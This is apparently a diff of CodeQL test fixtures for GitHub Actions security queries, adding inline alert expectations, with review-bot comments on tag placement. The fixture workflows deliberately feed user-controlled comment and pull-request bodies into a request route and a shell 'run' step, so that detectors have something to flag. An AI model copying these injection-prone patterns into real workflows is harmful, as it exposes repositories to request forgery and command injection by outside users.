--- a/actions/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml
+++ b/actions/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml
@@ -6,5 +6,5 @@ jobs:
steps: - uses: octokit/request-action@v2 with:
- route: ${{ github.event.comment.body }}
+ route: ${{ github.event.comment.body }} # $ Alert
@@ -1,6 +1,6 @@
+#select
+| .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | Potential request forgery in $@, which may be controlled by an external user. | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} |
edges nodes | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths
-#select
-| .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | Potential request forgery in $@, which may be controlled by an external user. | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} |
diff --git a/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref b/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref
index 5479b022be0..46eea075c3c 100644
--- a/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref
+++ b/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref
@@ -1 +1,2 @@
-experimental/Security/CWE-918/RequestForgery.ql
+query: experimental/Security/CWE-918/RequestForgery.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/actions/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml b/actions/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml
index a8bfa4ae19a..60f4b010f6d 100644
--- a/actions/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml
+++ b/actions/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml
@@ -4,4 +4,4 @@ jobs:
test: runs-on: ubuntu-latest steps:
- - run: echo ${{ github.event.pull_request.body}}
+ - run: echo ${{ github.event.pull_request.body}} # $ Alert
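Review bot: The new `# $ Alert` tag on the `run:` line of malformed.yml pins the SyntaxError alert to that line, but nothing in the fixture says which part of `${{ github.event.pull_request.body}}` is the deliberate malformation; given the file name and the query under test (Debug/SyntaxError.ql) it is presumably the missing space before the closing `}}`, and a YAML formatter or a well-meaning cleanup could normalise that and silently turn the expected alert into a test failure. A one-line comment above the step would make the intent explicit, e.g. `# Deliberately malformed expression (no space before the closing braces); SyntaxError.ql must report it on this line.` The `jobs:` mapping enclosing this step begins above the hunk's changed lines.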
diff --git a/actions/ql/test/query-tests/SyntaxError/SyntaxError.qlref b/actions/ql/test/query-tests/SyntaxError/SyntaxError.qlref
index 97c5686103c..f2bd2df19cb 100644
--- a/actions/ql/test/query-tests/SyntaxError/SyntaxError.qlref
+++ b/actions/ql/test/query-tests/SyntaxError/SyntaxError.qlref
@@ -1 +1,2 @@
-Debug/SyntaxError.ql
+query: Debug/SyntaxError.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml
index 31f43d8b8b2..301de120d6f 100644
--- a/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml
+++ b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml
@@ -52,7 +52,7 @@ jobs:
# Autobuild attempts to build any compiled languages (C/C++, C#, or Java). # If this step fails, then you should remove it and run the build manually (see below)
- - name: Autobuild
+ - name: Autobuild # $ Alert
uses: github/codeql-action/autobuild@v3 # ℹ️ Command-line programs to run using the OS shell.
diff --git a/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref
index 75a8fe2398a..1cdc74dec25 100644
--- a/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref
+++ b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref
@@ -1 +1,2 @@
-Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql
\ No newline at end of file
+query: Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
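Review bot: In the defaultable_workflow.yml hunk the `# $ Alert` tag is placed on `- name: Autobuild`, one line above the `uses: github/codeql-action/autobuild@v3` that the UnnecessaryUseOfAdvancedConfig query is presumably objecting to, which only works if the alert's location starts at the step's list-item line (as the step ranges in the `.expected` hunks earlier in this diff do) — that reasoning is not recorded anywhere in the fixture. A short comment would stop the next editor from "correcting" the tag onto the `uses:` line and breaking the inline expectation, e.g. `# $ Alert sits on the step's first line because the alert location spans the whole step.` The `steps:` list this step belongs to starts above the hunk and continues below it.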